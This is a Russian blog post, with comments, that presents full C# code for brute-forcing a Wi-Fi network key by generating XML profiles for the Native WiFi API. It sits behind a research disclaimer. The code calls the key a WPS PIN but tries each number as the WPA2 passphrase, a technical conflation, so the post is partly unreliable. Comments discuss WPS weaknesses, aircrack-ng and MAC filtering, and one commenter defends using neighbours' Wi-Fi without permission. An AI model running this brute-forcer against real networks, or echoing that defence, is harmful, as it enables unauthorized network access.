Надежные и постоянно меняющиеся пароли - это здорово. Особенно когда они меняются и на Wi-Fi роутере и WPS на нем вообще отключен. В этом посте: сколько занимает перебор WPS pin и есть ли у этого практическое применение? А еще напишем программу для брутфорса на C#
Дисклеймер: информация представленная в публикации носит сугубо исследовательский характер для рассмотрения модели угрозы "брутфорс" (подбор пароля) с целью оценки защищенности тестового стенда и не является инструкцией к противоправным действиям. Исследование проводилось на тестовом стенде, состоящим из личного оборудования, не подключенного к сети интернет. Ответственность за противоправное использование полученной информации ложится на субъекта воспроизвевшего атаку не в исследовательских целях и против оборудования других субъектов.
Итак
Самый скучный но обязательный блок статьи позади, однако стоит вспомнить и про следующие статьи УК РФ:
ст. 272 УК РФ. Неправомерный доступ к компьютерной информации
ст. 273 УК РФ. Создание, использование и распространение вредоносных компьютерных программ
ст. 138 УК РФ. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений
ст. 159.6 УК РФ. Мошенничество в сфере компьютерной информации
Взламывать чужие Wi-Fi роутеры - это очень плохая идея.
Тем не менее, в качестве "proof of concept" попробуем воспроизвести брутфорс атаку на домашний роутер с использованием C#. Атака будет основана на использовании Native WiFi API и xml профилях.
Профили для Wi-Fi, на мой взгляд, заслуживает отдельной статьи и для меня стало большим удивлением, что существует получение профиля, например, прямо с сайта - об этом есть небольшая статья в документации Майкрософт. В кратце это работает так: xml с реквизитами для подключения подтягивается в системные настройки (а если точно, то в UWP приложение Настройки) и во всплывающем окне показывается какую сеть предлагается добавить. Как сказано в самой статье, это может быть использовано для добавления сети заранее, еще до посещения кафе/лаунджа/{you_name_it} где вещает сеть. Подробно элементы xml профиля описаны тут.
Атака будет производиться посредством генерации xml профиля в коде и его передачи в Native WiFi API - далее Windows выполнит попытку подключиться и, если удалось подобрать WPS pin, удачно использованный профиль останется в компьютере, а pin будет выведен на консоль.
Посмотреть уже существующие профили можно двумя способами: вручную и через консоль. Для ручного просмотра нужно зайти в C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces и выбрать адаптер по его Id - узнать этот Id можно при небольшом дебаге подключаемой библиотеки или перебрав вручную. Для просмотра через консоль потребуются права администратора и пара команд - этот способ более удобен для точечного вытаскивания профиля к нужной сети:
netsh wlan show profile
netsh wlan export profile name="{Insert profile name}" folder=C:\WlanProfiles
Чтобы не ошибиться со значениями и полями в xml профиле, можно сперва попытаться подключиться к атакуемой Wi-Fi сети с заведомо неправильным паролем - так Windows создаст xml файл за вас и далее останется лишь динамически подставлять пароли.
В примере xml профиль будет храниться в виде строки в коде и это не самый лучший подход к формированию xml, но его вполне хватит чтобы поиграться с попытками подключится к сети. На самом деле на сайте документации Майкрософт есть xsd схема по которой создаются xml профили, но почему-то в ней отсутствует секция "sharedKey", поэтому я решил хранить xml профиль просто строкой в коде как это описано на Stackoverflow. В целом для более "промышленного" решения можно сгенерировать классы через xsd.exe, но в конкретно этом случае придется сверяться с xml профилем атакуемой сети для поиска всех недостающих полей, так как вполне возможно что опубликованная xsd схема просто устарела.
С подобной атакой должен справиться любой Wi-Fi адаптер, но подбор пароля без стратегии и без параллелизации на несколько адаптеров займет много времени. Так перебор WPS pin одним адаптером и попыткой раз в 2 секунды может занять до 6.3 года или же до 2315 дней. Уместно будет вспомнить цитату, что "9 женщин не родят ребенка за месяц", ведь использование 9 адаптеров сократит подбор пароля до 257 дней - почти 9 месяцев :D
Шаг 1 - Подготовка решения
Для начала склониуйте проект ManagedWiFi - это обертка для доступа к сборке wlanapi.dll, которая даст доступ к Native WiFi API - последняя дает возможность просматривать состояние Wi-Fi адаптеров, сетей, и добавлять профили для подключения, что и будет использовано для воспроизведения атаки.
Здесь я отмечу, что в NuGet есть пакет ManagedWiFi, но во время подключения к Wi-Fi выпадало исключение - у меня это решилось ссылкой на скаченный проект, но может быть пакет заработает у вас с первого раза.
Далее создайте проект с консольным приложением и сделайте ссылку на проект ManagedWifi из скачанного репозитория либо добавьте одноименный пакет NuGet. Этот этап можно считать успешным, если получилось создать объект WlanClient, увидеть список адаптеров и вывести список доступных сетей:
WlanClient client = new ();
foreach (WlanClient.WlanInterface wlan in client.Interfaces)
{
wlan.Scan();
Wlan.WlanAvailableNetwork[] networks = wlan.GetAvailableNetworkList(0);
foreach (Wlan.WlanAvailableNetwork network in networks)
{
string ssid = Encoding.Default.GetString(network.dot11Ssid.SSID);
Console.WriteLine(ssid);
}
}
Шаг 2 - профиль для Wi-Fi
Профиль будет собираться из трех составляющих: название профиля, hex значение названия SSID и WPS pin c которым будет выполняться попытка подключения, а все остальные поля возьмем из xml профиля с которым ранее пытались подключиться к аналогичной сети. Для теста попробуем подключиться к сети с защитой WPA2PSK/AES, которую нашли выше:
string key = "00000001"; // А еще сюда можно вписать заранее (не)известный пароль
string profileName = Encoding.Default.GetString(network.dot11Ssid.SSID);
byte[] hexBytes = Encoding.Default.GetBytes(profileName);
string hex = BitConverter.ToString(hexBytes).Replace("-", "");
string profileXml = string.Format(
"<?xml version=\"1.0\"?><WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"><name>{0}</name><SSIDConfig><SSID><hex>{1}</hex><name>{0}</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>{2}</keyMaterial></sharedKey><keyIndex>0</keyIndex></security></MSM></WLANProfile>",
profileName, hex, key);
Как было сказано в самом начале, на каждую попытку будет создаваться такой xml профиль, а уже существующий профиль для атакуемой сети будет перезаписываться. Далее при вызове метода Connect, будет передаваться имя профиля по которому нужно выполнить соединение:
try
{
wlan.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
wlan.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
await Task.Delay(2 * 1000);
}
catch (Exception e)
{
Console.WriteLine(e);
}
Шаг 3
Соберем все что получилось в одном месте и попробуем запустить:
using System.Text;
using NativeWifi;
// Берем первый попавшийся Wi-Fi адаптер
WlanClient client = new ();
WlanClient.WlanInterface wlan = client.Interfaces[0];
wlan.Scan();
Wlan.WlanAvailableNetwork[] networks = wlan.GetAvailableNetworkList(0);
if (networks.Length == 0)
{
OutputExtensions.PrintRow("No networks found");
return;
}
// Отбираем сеть по её названию
Wlan.WlanAvailableNetwork network = networks
.FirstOrDefault(n => Encoding.Default.GetString(n.dot11Ssid.SSID) == "desired_network_name");
// Подготавливаем данные для создания профиля
string profileName = Encoding.Default.GetString(network.dot11Ssid.SSID);
byte[] hexBytes = Encoding.Default.GetBytes(profileName);
string hex = BitConverter.ToString(hexBytes).Replace("-", "");
// Перебираем значения WPS pin - максимум 8 цифр.
// Также же тут можно сделать перебор по словарю утекших паролей
for (int i = 0; i < 99999999; i++)
{
string wpsPin = $"{i}";
wpsPin = new string('0', 8 - wpsPin.Length) + wpsPin;
Console.WriteLine($"Trying pin {wpsPin}");
string profileXml = string.Format(
"<?xml version=\"1.0\"?><WLANProfile xmlns=\"http://www.microsoft.com/networking/WLAN/profile/v1\"><name>{0}</name><SSIDConfig><SSID><hex>{1}</hex><name>{0}</name></SSID></SSIDConfig><connectionType>ESS</connectionType><connectionMode>manual</connectionMode><autoSwitch>false</autoSwitch><MSM><security><authEncryption><authentication>WPA2PSK</authentication><encryption>AES</encryption><useOneX>false</useOneX></authEncryption><sharedKey><keyType>passPhrase</keyType><protected>false</protected><keyMaterial>{2}</keyMaterial></sharedKey><keyIndex>0</keyIndex></security></MSM></WLANProfile>",
profileName, hex, wpsPin);
try
{
wlan.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
wlan.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
// Тут задается время ожидания для попытки
// В моей конфигурации это 2 секунды, но
// время придется подбирать вручную
await Task.Delay(2 * 1000);
}
catch (Exception e)
{
Console.WriteLine(e);
}
if (wlan.CurrentConnection.isState == Wlan.WlanInterfaceState.Connected)
{
Console.WriteLine($"WPS pin is {wpsPin}");
break;
}
Console.WriteLine($"WPS pin {wpsPin} did not work");
}
Вместо заключения
Как оказалось, написать программу для подбора WPS pin на C# можно, а кроме просто перебора цифр при небольших доработках можно даже перебрать пароли из файла.
Практического смысла в этой программе крайне мало, но как минимум что-то можно переиспользовать для обновления Wi-Fi профилей в корпоративных ноутбуках либо провести другой вид атаки и, например, заставить нужное устройство подключиться к "правильной" сети.
В свободном доступе давно существует aircrack-ng и при минимальных знаниях можно в разумное время подобрать пароль к сети просто следуя гайду. И помните: взламывать чужие Wi-Fi роутеры - это очень плохая идея.
Комментарии (51)
Moraiatw
10.07.2022 09:46+5Дотнет, импорт конфигов - все это низко эффективно.
И главное - где результаты, замеры скорости, времени?
402d
10.07.2022 09:56+7В коде у автора есть. Это не пентест инструмент. Скорее пример работы с СДК вифи
// Тут задается время ожидания для попытки
// В моей конфигурации это 2 секунды, но
// время придется подбирать вручную
await Task.Delay(2 * 1000);
NAI
10.07.2022 13:16+10Начать стоит с того что предложенный алгоритм не самый эффективный.
Надо проверять включен ли WPS и если да то какой версии.
Последняя цифра в WPS - это контрольная сумма - зачем ее брутить, когда можно считать? Минус один порядок.
Если это WPS версии 1, то нет смысла перебирать все PIN-коды как единое целое. Надо перебирать сначала первые 4 цифры, потом оставшиеся 3. В общем вот - https://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup
Ну и прочие pixie dust тоже желательно эээ... учитывать
Так что тут в целом не понятно зачем и для чего брут - можно же было просто "Пишем приложение для подключения к Wi-Fi"
PereslavlFoto
10.07.2022 13:35-11Практического смысла в этой программе крайне мало
Практический смысл всегда один и тот же. Вы нуждаетесь в интернете на два дня, однако платить за целый месяц у вас просто не хватает денег, а доступ на два дня никто не продаёт. В этом случае вы обречены подключаться к соседям.edogs
10.07.2022 13:50+8Сейчас это уже не так актуально.
В банках, кафешках и прочих учреждениях есть бесплатный вайфай, с авторизацией по телефону иногда, но это не проблема. С удлинителем вайфая в более или менее крупном городе будет несколько точек доступно на выбор.
Интернет-провайдеры зачастую дают бесплатный инет на небольшой скорости даже при нулевом балансе. Да, торренты с фильмами 4к не покачаешь, но если Вы «нуждаетесь» в интернете, то этого достаточно.ThePaleEmperor
10.07.2022 15:39+1Это в Москве так?
edogs
10.07.2022 21:17+2Если Вы про первый пункт, то не только. Во многих городах — крупные сети жрален, банки, торговые центры, отели, мед.клиники — имеют в том или ином виде точки доступа к которым можно законнектится.
Вход либо по телефону либо по паролю, пароль зачастую можно нагуглить или зайти и взять — меняют их достаточно редко (в соседней стоматологии уже 3 года не меняют:) ).
Путешествовали до ковида достаточно много, нигде без интернета халявного не оставались.
Да и сейчас в питере из дома (не так что бы центровой район) минимум 4 точки видно рабочих.
В целом если задаться вопросом — то в более или менее приличном городе что-то да найдется.
Но еще раз — крайне желательно иметь удлинитель вайфая, т.к. в зоне действия «обычной ноутбучной крохотульной антенки» шансы что-то поймать небольшие даже в москве.
Если про второй пункт, то обещанный платеж на сотовом у всей тройки есть. У наземных сейчас не нашли что-то, но у интерзета в питере раньше точно было.
PereslavlFoto
10.07.2022 17:01-2Прошу вас, назовите мне такого провайдера, который готов заключить со мною договор на два дня. Я готов заплатить (1000 рублей за месяц / 30 дней ) * 2 нужных мне дня = 66 рублей.
Спасибо.Moskus
10.07.2022 22:01+7Провайдер вашего мобильного телефона - можете подключить подходящий пакет, а потом подключиться к точке доступа на телефоне с компьютера. Или, если вы в роуминге - местный телефонный провайдер с предоплаченным тарифом, аналогично.
(Сейчас, судя по вашим прошлым комментариям, самое время вам начать выдумывать какие-то детали, почему это не сработает или не устроит лично вас.)
PereslavlFoto
11.07.2022 00:11-3Спасибо. Ниже уже сказали, что Мегафон предлагает такой пакет услуг на один день. Лично для меня это хорошее решение.
Однако в тех случаях, о которых я рассказал в комментариях, дело совсем иное. Просто те люди не похожи на вас, и поведение у них другое.Moskus
11.07.2022 02:57Какие "те люди" и что вы вообще знаете обо мне, чтобы говорить, что кто-то на меня не похож?
Gor40
12.07.2022 13:04Мой провайдер Ufanet, даёт социальный бесплатный "доступный интернет". Кончились денежки на счёте, я подключил "кредит доверия", т.е. продлил услугу на 7 дней без оплаты. Оказалось "кредит доверия" сократили с 7 до 5 дней. И как у меня обычно "внезапно" около полуночи интернет кончился. Внизу страницы, на которую меня переадресовал провайдер была кнопочка "доступный интернет". Действует сутки. Назавтра можно снова подключить. Ооооочень медленный. В ЛК провайдера я так и не смог зайти. Страница электронного кошелька открывалась полчаса. А вот Ютуб летал. И вообще все страницы не зоны ru, открывались легко. Я наугад открыл с десяток страниц типа house.com, pupupu.com и ещё какие-то.
P.S. У меня тариф 400 руб./мес., откуда у вас 1000? У нас даже в частном секторе тарифы одинаковые.
NAI
10.07.2022 14:57+3Вы знаете, я нуждаюсь в десятке миллионов на пару месяцев, однако платить % за такой кредит у меня просто не хватает денег. В этом случае, по вашей логике, надо пойти и ограбить соседа?
PereslavlFoto
10.07.2022 17:00-7Правильная аналогия чуть-чуть иная. Наступил вечер, однако у вас нет фонаря. Вы можете пойти к соседским окнам, взять освещение из соседских окон и писать свою книгу при его освещении. Пришло время поливать огурцы, однако у вас не хватает воды. Вы можете взять воду, которая течёт на крышу соседа, для этого подойти к соседскому дому и подставить русло, чтобы вода с соседской крыши стекала в вашу бочку. Соседи ломают сарай, а вам нечем топить печку. Вы можете отправиться к ним и собрать обломки досок, чтобы с их помощью греться в холодное время.
Речь идёт не о том, чтобы взять избыток, не нужный соседям. Речь не о том, чтобы отнять ограниченный ресурс. Напротив, мы обсуждаем способ, чтобы взять частицу того, чего у соседей в большом-пребольшом избытке.NAI
10.07.2022 17:26+7А полоса пропускания это безлимитный, безграничный ресурс, по вашему? Т.е. MIMO в 802.1n вкорячивали просто так?
Полоса пропускания провайдера, это тоже по вашему не ресурс? Люди просто так платят дополнительные деньги за каждые +10\20\30\100 мб\с?
Про ответственность как ресурс вообще и говорить не приходится. Не, не хотите брать?
Речь идёт не о том, чтобы взять избыток, не нужный соседям
Откуда вы знаете что в избытке, а что нет? какие планы у хозяина на этот избыток? Сколько времени и сил он потратил чтобы это у него появилось?
Это не ваш ресурс, он вам не принадлежит, все, точка, тут нечего обсуждать. Брать чужое без разрешения - кража и воровство.
PereslavlFoto
10.07.2022 17:41-21. Обсудим ситуацию подробнее. У соседей есть двухкомнатная квартира, на которую они раздают интернет при помощи wi-fi роутера. Соседи живут на два этажа выше меня, то есть между нами два бетонных перекрытия. Неужели тот сигнал, который доходит до меня, будет отнимать у них какую-либо заметную полосу пропускания?
2. Полоса пропускания провайдера заложена на квартиры с большим избытком. Именно это позволяет моим соседям подключать и компьютер, и два телевизора, и смартфоны.
3. Я хотел бы сам нести ответственность за моё подключение и сделанные мною обращения в течение двух дней в месяц. К сожалению, ни один провайдер не позволяет заключить договор на два дня.
4. Соседи взяли минимальный тариф, потому что им не нужна такая широкая полоса пропускания. Они были готовы платить меньше за меньшую скорость, однако провайдер не позволяет платить меньше.
5. Я поддерживаю ваши слова про кражу и воровство. Поэтому хотелось бы всё-таки узнать, как следует поступать в этом случае. Покупать сотовый доступ к интернету — это интересный способ, однако я не знаю сотовых провайдеров, которые предлагают доступ на два дня за 30—50 рублей.
Подчеркну, всё упирается в то, что доступ на неделю не нужен. Неделя — это слишком много. Нужно всего лишь на два дня.NAI
10.07.2022 18:25+7Неужели тот сигнал, который доходит до меня, будет отнимать у них какую-либо заметную полосу пропускания?
Да, будет, особенно если сигнал "не очень". Прочитайте как работает wi-fi и почему на корпоративных AP есть отдельный параметр "при каком уровне сигнала кикать клиента".
2. Полоса пропускания провайдера заложена на квартиры с большим избытком. Именно это позволяет моим соседям подключать и компьютер, и два телевизора, и смартфоны.
Вы им QoS настраивали? А себе? Или включив торрент будете класть iptv? Откуда вы знаете что им надо и в какой момент времени? Вы как вы отслеживаете загрузку чужого канала чтобы понять когда он ушел в оверхеад? У вас будет настроено автоматическое ограничение своего канала?
Мы тут взрослые люди и понимаем что ответ на все эти вопросы - "нет".
Повторяю вопрос - откуда вы знаете что ресурс с избытком?
К сожалению, ни один провайдер не позволяет заключить договор на два дня.
А я хочу ездить на гелике, зарплату в миллон и мир во всем мире. Школьники в Урюпинске хотят себе 3090Ti и i9. Каждый из нас чего-то хочет - это что повод нарушать закон и брать чужое без спроса?
4. Соседи взяли минимальный тариф, потому что им не нужна такая широкая полоса пропускания. Они были готовы платить меньше за меньшую скорость, однако провайдер не позволяет платить меньше.
Кто сказал? На основании чего делается такой вывод? И кто дает право решать за других?
5. Я поддерживаю ваши слова про кражу и воровство. Поэтому хотелось бы всё-таки узнать, как следует поступать в этом случае. Покупать сотовый доступ к интернету — это интересный способ, однако я не знаю сотовых провайдеров, которые предлагают доступ на два дня за 30—50 рублей. Подчеркну, всё упирается в то, что доступ на неделю не нужен. Неделя — это слишком много. Нужно всего лишь на два дня.
Все просто - а почему вы решили что интернет должен стоить 50 р. и продаваться "днями"? Вы с тем же успехом можете прийти в магазин и сказать "мне не нужен килограмм (900) гречки\сахара\вписать свое, я тут на 2 дня, дайте мне стакан\ложку\каплю" - но нет, вы берете кило, варите и через день уезжаете выкидывая продукт.
Соответственно, относиться к этому надо так - интернет на 2 дня стоит 400р. т.е. 200 р\день (ну или сколько там вы бываете в месяц\год) - дорого для вас? не пользуйтесь, тем более что интернет это не предмет первой необходимости.
И да, я плачу почти 4000 р\год за интернет где активный пользователь бывает суммарно дней 30-40 в году, но се ля ви.
PereslavlFoto
10.07.2022 18:34-22. Конечно, в этом случае нельзя смотреть видео или включать торренты.
4. Вывод о тарифе сделан после многочисленных опросов.
5.1. Интернет стоит 1000 рублей за 30 дней, то есть 33 рубля в день.
5.2. Ваша аналогия с магазином правильная: там можно купить три конферы, один пряник, одно яблоко, можно купить одну сосиску (они продаются на развес) и 60 граммов сыра.интернет на 2 дня стоит 400р. т.е. 200 р\день (ну или сколько там вы бываете в месяц\год) — дорого для вас?
Вы совершенно правы. Именно потому, что это слишком дорого, и приходится искать соседский wi-fi.плачу почти 4000 р\год за интернет где активный пользователь бывает суммарно дней 30-40 в году,
4000/40 = 100 рублей в день. С одной стороны, это не самая плохая цена. С другой стороны, 4000 / 12 = 335 в месяц, такого тарифа нет. С третьей стороны, этот способ работает лишь при условии, если названные 40 дней проходят в одном месте.
Напомню, что мы обсуждаем, зачем вообще нужен соседский wi-fi и какие причины заставляют к нему обращаться. Вы рассказали, что у вас нету таких причин. Я же рассказываю, что у других людей есть такие причины. Конечно, другие люди сильно отличаются от вас, ситуация у них совсем другая.IndependentFM
10.07.2022 18:59+4а еще можно просто постучаться к соседям, объяснить ситуацию и предложить денежную компенсацию за пользование вайфаем на двое суток.
А вообще смешно, что на хабре на серьезных щщах обсуждают экономию 500 рублей.NAI
10.07.2022 19:15+7Грустно то что на хабре обсуждают как из-за 50 рублей в день можно нарушать законы, ломать чужие сети и пр. потому что "ну мнеж надо!"
PereslavlFoto
10.07.2022 19:22-5Да, если жить в одном месте регулярно, снова и снова — этот способ идеальный, самый лучший. Вы правы.
IndependentFM
10.07.2022 21:27+3Идеальный способ в таком случае - использовать мобильный интернет. Но и на это, наверное, есть какая-то очередная отмазка или контр-аргумент.
NAI
10.07.2022 19:39+25.2. Ваша аналогия с магазином правильная: там можно купить три конферы, один пряник, одно яблоко, можно купить одну сосиску (они продаются на развес) и 60 граммов сыра.
Купить пол-конфеты? Пол-яблока? Ну попробуйте попросить 1\30 килограмма сыра =)
5.1. Интернет стоит 1000 рублей за 30 дней, то есть 33 рубля в день.
Почему 1000? Почему не 10 000? Почему не 500? Я вот за свой плачу 400.
4. Вывод о тарифе сделан после многочисленных опросов.
Я вот этого не понимаю. Вот вообще, на прочь. Спросили Петю, Васю и решили что у Димы то же самое - с чегобы это вдруг? На основании чего такой вывод? Г-лоГика.
Дальше вести дискуссию нет смысла, т.к. пошло скатывание в граничные условия аналогий и попыток придумать контр-пример.
Если ваше "ну мнеж надо" сильнее ГК\УК РФ, тогда не обижайтесь если вас киданут на деньги\отожмут\украдут чего, там тоже у людей логика "мнеж надо, а лох еще заработает, вон в ОйТи зарплаты какие"
Moskus
10.07.2022 22:08+3Хипповско-коммуняцкая риторика про "избыток", который подобные индивидуумы, по вполне понятным причинам (потому что понимают, что это может быть вовсе не избыток для тех, кто за это действительно заплатил) относят к избытку самостоятельно, руководствуясь собственным удобством и/или желаниями, старательно избегая того, чтобы спрашивать разрешение на пользование этим "избытком". Следующий шаг в развитии подобной риторики - экспроприация и "всё поделить". На счастье, не все хиппи делают этот шаг, но к большому сожалению - создают почву для того, чтобы его делали другие.
PereslavlFoto
11.07.2022 00:04-3Скажите пожалуйста, вы закрываете ставни, чтобы никто не читал под ваше оконное освещение?
Moskus
11.07.2022 02:56Из вас плохой демагог, потому что вы повторяете все ту же самую заведомо ложную аналогию, которую вам уже разложили.
В общем случае, вы не можете сказать, мешает ли ваше лишнее подключение конкретному соседу, или нет. Это не то же самое, что воспользоваться светом, который и так теряется. Заканчивайте выкручиваться, вам риторических навыков маловато, да и тема заведомо проигрышная.
ihouser
10.07.2022 20:18+2А попросить соседа доступ на два дня за банку пива мысль не посетила нищебродскую голову? И от куда компьютер способный на брутфорс, тоже у соседа сперли?
dartraiden
10.07.2022 20:27+1Мой сосед, когда попал в такую ситуацию, пришёл ко мне и просто попросил.
PereslavlFoto
11.07.2022 00:03-2Случай, о котором вы сказали, уже разобран выше. Всё верно: ЕСЛИ надо жить постоянно в этом месте, ТОГДА легче всего попросить у соседей или купить у соседей. Но это только для случая, когда надо постоянно жить в этом месте.
Я же привёл для иллюстрации случай, когда надо жить в разных местах.Moskus
11.07.2022 03:00+1Это совершенно не важно, что вам лично легче. Важно, что честнее по отношению к тем, у кого вы тырите. И это не так важно, украли вы чуть-чуть или много. Предвосхищая возражение об отсутствии наказания за кражу в малых размерах - нижнее ограничение существует потому, что наказать за это может стоить недешево, а эффект пропорционально малого наказания - ничтожен.
PereslavlFoto
11.07.2022 13:45А вот что действительно важно, это ваш переход на личности. Я ни словом не прошёлся по вам. В ответ вы, безо всякой причины, начали личные выпады против меня.
Moskus
11.07.2022 16:36+1Переход на личности - это указание на личные качества оппонента, которые не имеют отношения к обсуждаемому вопросу, с целью общей дискредитации.
Тогда как в комментарии выше, "вам" означает неопределенную группу людей - это норма русского языка. Впрочем, лично вас это группа включает, потому что конкретно вы защищаете образ действий, который критикуют в этой ветке. Соответственно, любой, включая меня, может правомерно предположить, что лично вы готовы поступить таким образом, потому что вы такой подход защищаете. Тем более, что вы многократно в этой ветке писали от первого лица, то есть говоря за себя.
Потому изобразить невинную жертву необоснованных нападок у вас не получится. Это ещё более отвратительно, чем мелкое воровство.
PereslavlFoto
11.07.2022 17:24Я не защищаю, а объясняю такой образ действий.
И, разумеется, я не могу изобразить невинную жертву зряшных нападок, ведь я являюсь такой жертвой.
ALexhha
10.07.2022 17:12+6Напомнило
Moskus
10.07.2022 22:18Второе совершенно не обязательно влезет в лимит на длину, потому что некоторые символы в UTF8 будут занимать несколько байт.
Moskus
11.07.2022 09:30Исправляюсь - FLÜGGÅɘNKð€ČHIŒβØLʃÊN занимает всего 33 байта, хотя это только 21 символ. Даже если переписать как FLÜGGÅɘNKð€ČHIŒβØLʃÊN, получится всего 25 символов и 37 байт.
Mitya78
10.07.2022 22:31+1А если в нынешних условиях халявщик полезет не на тот ресурс, то у хозяев сети могут быть проблемы.
k2a3o
10.07.2022 23:15Совершенно бессмысленное занятие. Это точно не пентест... При длине типового пароля минимум 8 знаков, получается примерно 722 204 136 308 736 комбинаций, при заданном периоде ожидания ответа из кода в 2 сек, время на перебор потребуется неприемлемо много. Брутфорс с использованием aircrack-ng и тот не имеет никаких перспектив при длине пароля начиная с 10 знаков.
NAI
11.07.2022 00:35+1Речь не про пароль, речь про PIN при использовании WPS. Там во-первых только цифры, во-вторых 7 знаков + сумма. Итого, 10^7=10 000 000 при delay в 2 с. ~231 день. Это если не пользоваться багом WPSv1 который сокращает количество вариантов до 11 000, т.е. 6 дней.
Брутфорс с использованием aircrack-ng и тот не имеет никаких перспектив при длине пароля начиная с 10 знаков.
Имеет, овердохрена людей думают что номер мобилы в качестве пароля (11-12 цифр) это офигенно надежный пасс.
kenoma
А вот практический смысл в изучении безопасности WiFi сетей есть в освоении инструментария аrcrack-ng. Точнее, изучение aircrack-ng дает четкое и неиллюзорное представление о небезопасности вайфая.
AllSystemsMalfunction
Небольшую степень защиты даёт фильтрация по MAC адресам, целенаправленную атаку оная мера не остановит, но вполне защитит от голодного до ХСВ* школьника
Hidden text
ХСВ - халявный соседский вайфай
NAI
Не дает. Т.к. классический вариант получения пароля от wi-fi подразумевает перехват хэндшейка между AP и клиентом. Т.е. вы априрори будете знать МАК клиента. И так как это классический вариант с мануалами из 2014- года, то про него не будет знать только совсем ленивый\тупой скрипт-кидди.
staticmain
Меня память подводит, или айфоны каждый раз при подключении рандомят свой мак?
dartraiden
Не знаю, как в айфонах, но в Android можно для конкретной сети отключить рандомизацию.
shark14
В iOS тоже можно отключить "частный адрес Wi-Fi" для конкретной сети.
radioxoma
При поиске/подключении к открытым сетям все смартфоны (Apple, Android) давно рандомят MAC. С некоторых пор рандомизация используется при подключении и к закрытым сетям. Так, в сетях московского общественного транспорта требуется рандомизацию отключать, чтобы работала авторизация (идёт привязка к номеру телефона и, соответственно, личности).
Не знаю точно, но по всей видимости в открытых сетях мак рандомится при каждом подключении, а в частных однажды сгенерированный мак "навсегда" привязывается к сети т.к. постоянная смена мака вводит в заблуждение DHCP-сервер.
Ещё момент: некоторые сетевые карты (Intel под Windows точно) или их драйверы требуют, чтобы soft MAC начинался с особой последовательности, чтобы указать на то, что адрес не настоящий.
Защиты от конкретно чего? Макфильтр блокирует ассоциацию с точкой, что никак не влияет на перехват хендшейка, PMKID и дальнейший перебор пароля.
sirocco
Нет. Не каждый раз. А один раз для конкретной точки доступа. И андроиды тоже так могут. Дома есть три точки доступа, на всех mac айфона разный, но на каждой точке всегда один и тот же.